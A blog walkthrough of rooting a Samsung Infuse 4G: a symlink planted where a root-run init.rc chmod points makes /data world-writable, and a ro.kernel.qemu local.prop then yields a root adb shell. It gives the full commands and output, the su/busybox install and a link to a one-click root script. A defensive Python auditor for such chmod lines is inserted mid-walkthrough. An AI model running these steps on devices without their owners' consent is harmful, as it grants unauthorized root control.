I received a Samsung Infuse 4G this year for Christmas, and one of the first questions I had was how to let this bad boy run free. Doing a little searching around, it looked like the device was already rootable by the RageAgainstTheCage exploit by the Android Exploid Crew, but of course using an already-written, pre-compiled exploit is too boring.
Note: before we even begin, the device needs USB debugging enabled so we can interact with it from a shell via ADB (the Android Debug Bridge).
After some snooping around, I noticed that the device was vulnerable to a flaw similar to the ones Dan Rosenberg found with the Droid 3 and Admire. In the init.rc script (which is run at startup as root), we see the following command:
```
# Permission for WMDRM sample.hds file
chmod 0777 /data/data/.drm/.wmdrm/sample.hds
```
The sample.hds file doesn’t actually exist, but that’s irrelevant: the chmod runs at every boot regardless of what is at that path. The interesting thing here is that the .wmdrm directory is itself 0777, so we have full control over its contents. Let’s create a symlink to /data where sample.hds is supposed to be and reboot:
```
$ ln -s /data /data/data/.drm/.wmdrm/sample.hds
$ ls -l /data/data/.drm/.wmdrm/sample.hds
lrwxrwxrwx shell shell 2012-01-02 20:13 sample.hds -> /data
$ exit
sh-4.1$ ./adb reboot
sh-4.1$ ./adb shell
$ ls -l
drwxrwx--x system system 2012-01-02 20:14 dbdata
dr-x------ root root 2012-01-02 20:14 config
drwxrwx--- system cache 2012-01-02 20:14 cache
drwxrwx--x radio radio 2012-01-02 20:14 efs
lrwxrwxrwx root root 2012-01-02 20:14 sdcard -> /mnt/sdcard
drwxr-xr-x root root 2012-01-02 20:14 acct
drwxrwxr-x root system 2012-01-02 20:14 mnt
lrwxrwxrwx root root 2012-01-02 20:14 d -> /sys/kernel/debug
lrwxrwxrwx root root 2012-01-02 20:14 etc -> /system/etc
drwxr-xr-x root root 2012-01-02 20:14 system
drwxrwxrwx system system 2012-01-02 20:14 data
drwxr-xr-x root root 1969-12-31 19:00 sys
drwxr-xr-x root root 2011-08-03 23:33 modules
dr-xr-xr-x root root 1969-12-31 19:00 proc
drwxr-xr-x root root 2012-01-02 20:14 dev
-rwxr-xr-x root root 12127 2010-08-12 10:06 recovery.rc
-rwxr-xr-x root root 945 2010-08-27 09:41 lpm.rc
-rw-r--r-- root root 25100 2011-03-17 02:00 init.rc
drwxr-xr-x root root 2011-08-03 23:33 res
drwxr-xr-x root root 2011-08-03 23:33 lib
drwxr-xr-x root root 2011-08-03 23:33 sbin
-rw-r--r-- root root 118 2011-08-03 23:13 default.prop
-rw-r--r-- root root 1677 2010-07-06 15:13 init.goldfish.rc
-rw-r--r-- root root 2378 2010-12-14 23:01 fota.rc
-rwxr-xr-x root root 379 2010-05-28 03:06 init.smdkc110.rc
-rwxr-xr-x root root 133016 2011-08-03 23:19 init
$
```
Our symlink was followed, and now the /data directory is 0777! From here we’ll create a /data/local.prop file with a property that tells the system not to drop privileges when spawning a shell:
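The root-run chmod above follows whatever happens to sit at the target path, so the check a reviewer of an init script wants is twofold: does any ancestor of a chmod/chown target live in a directory that an unprivileged user can write to, and is the target (or an ancestor) a symlink? The Python below is an added example, not code from this post or from the device firmware. It parses chmod/chown lines out of an init.rc fragment (constructed here, modelled on the line quoted above), audits the targets against a scratch directory tree that mirrors the layout in the post, and shows a chmod_nofollow() helper that uses O_NOFOLLOW plus fchmod() so a planted symlink is refused instead of followed. The names audit_init_rc, audit_path, chmod_nofollow, refuses_symlink and build_demo_fs are my own.

```python
import errno
import os
import re
import stat
import tempfile

# Constructed init.rc fragment modelled on the line quoted in the post;
# it is not the Infuse 4G's real init.rc.
SAMPLE_INIT_RC = """\
on post-fs-data
    # Permission for WMDRM sample.hds file
    chmod 0777 /data/data/.drm/.wmdrm/sample.hds
    chmod 0644 /system/etc/hosts
"""

# Matches "chmod MODE PATH", "chown USER PATH" and "chown USER GROUP PATH".
CMD_RE = re.compile(r"^\s*(chmod|chown)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")

def permission_targets(init_rc_text):
    """Yield (line_no, command, target_path) for each chmod/chown line."""
    for n, line in enumerate(init_rc_text.splitlines(), 1):
        m = CMD_RE.match(line)
        if m:
            yield n, m.group(1), m.group(4) or m.group(3)

def audit_path(path, root="/"):
    """List why a root-run chmod/chown on `path` could be redirected.

    Components are inspected under `root` (a staging copy of the device tree, or
    "/" on the device) with lstat(), so symlinks are reported rather than followed.
    Flagged: a world-writable ancestor directory (anyone can plant a symlink in
    it) and a symlink anywhere on the path (chmod/chown follow it).
    """
    findings = []
    parts = [p for p in path.split("/") if p]
    current = root
    for i, part in enumerate(parts):
        current = os.path.join(current, part)
        shown = "/" + "/".join(parts[: i + 1])
        try:
            st = os.lstat(current)
        except FileNotFoundError:
            break  # nothing more to inspect; a writable parent was already flagged
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{shown} is a symlink -> {os.readlink(current)}")
            break
        if i < len(parts) - 1 and stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
            findings.append(f"{shown} is world-writable ({oct(stat.S_IMODE(st.st_mode))})")
    return findings

def audit_init_rc(init_rc_text, root="/"):
    """Map init.rc line number -> (command, path, findings) for risky lines only."""
    report = {}
    for n, cmd, path in permission_targets(init_rc_text):
        findings = audit_path(path, root)
        if findings:
            report[n] = (cmd, path, findings)
    return report

def chmod_nofollow(path, mode):
    """chmod that refuses a symlink in the final component; returns the new mode.

    O_NOFOLLOW makes open() fail with ELOOP if `path` itself is a symlink, and
    fchmod() acts on the object that was actually opened, so there is no
    check-then-act window. Symlinks in earlier components are still resolved by
    the kernel, which is why audit_path() inspects the whole path.
    """
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    try:
        os.fchmod(fd, mode)
        return stat.S_IMODE(os.fstat(fd).st_mode)
    finally:
        os.close(fd)

def refuses_symlink(path, mode=0o777):
    """True if chmod_nofollow() declined because `path` is a symlink."""
    try:
        chmod_nofollow(path, mode)
    except OSError as e:
        return e.errno == errno.ELOOP
    return False

def build_demo_fs():
    """Scratch tree mirroring the post's layout (constructed, not a device image)."""
    root = tempfile.mkdtemp(prefix="infuse_demo_")
    for rel, mode in [("data", 0o755), ("data/data", 0o755), ("data/data/.drm", 0o755),
                      ("data/data/.drm/.wmdrm", 0o777), ("system", 0o755), ("system/etc", 0o755)]:
        os.mkdir(os.path.join(root, rel))
        os.chmod(os.path.join(root, rel), mode)
    with open(os.path.join(root, "system/etc/hosts"), "w") as fh:
        fh.write("127.0.0.1 localhost\n")
    # The symlink the post's unprivileged shell user planted: sample.hds -> /data
    os.symlink("/data", os.path.join(root, "data/data/.drm/.wmdrm/sample.hds"))
    return root

if __name__ == "__main__":
    root = build_demo_fs()
    for n, (cmd, path, findings) in sorted(audit_init_rc(SAMPLE_INIT_RC, root).items()):
        print(f"init.rc line {n}: {cmd} {path}\n    " + "\n    ".join(findings))
    link = os.path.join(root, "data/data/.drm/.wmdrm/sample.hds")
    print("chmod_nofollow refused the planted symlink:", refuses_symlink(link))
```

Run against a real extracted firmware image by passing its mount point as `root`; on the constructed tree the WMDRM line is the only one reported, with both the world-writable .wmdrm directory and the planted symlink listed, while the chmod on /system/etc/hosts passes because every ancestor is root-owned and not writable by others.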
```
$ echo ro.kernel.qemu=1 > /data/local.prop
$ exit
sh-4.1$ ./adb reboot
sh-4.1$
```
After restarting, the phone refuses to boot and vibrates repeatedly because of the ro.kernel.qemu property: we told the device it was running in an emulator when it’s actually still running on hardware, which confuses it. However, we are still able to spawn a shell with adb, and this time it is root:
```
sh-4.1$ ./adb shell
# id
uid=0(root) gid=2000(shell) groups=1007(log)
#
```
Success! For persistence, we’ll follow the typical song and dance and copy over some binaries and install the Superuser app:
```
# mount -o rw,remount /dev/stl9 /system
# exit
sh-4.1$ ./adb push su /system/bin
233 KB/s (26264 bytes in 0.109s)
sh-4.1$ ./adb push busybox /system/bin
500 KB/s (1867568 bytes in 3.646s)
sh-4.1$ ./adb install Superuser.apk
449 KB/s (196521 bytes in 0.427s)
	pkg: /data/local/tmp/Superuser.apk
^C
sh-4.1$ ./adb shell
# chmod 4755 /system/bin/su /system/bin/busybox
#
```
Clean up our files and reboot the device:
```
# rm /data/local.prop
# rm /data/data/.drm/.wmdrm/sample.hds
# reboot
sh-4.1$
```
Running `su` in the adb shell, or any app written for rooted phones, will now prompt the user (on the phone itself) to grant root privileges to that process. The choice can be remembered for future use.
A one-click root script for Linux is available here: http://www.poppopret.org/dl/Infuse4G-root.tgz . If this exploit works for other phones, contact me and I’ll update the post.
Thanks to Dan Rosenberg for his tips and guidance throughout the process.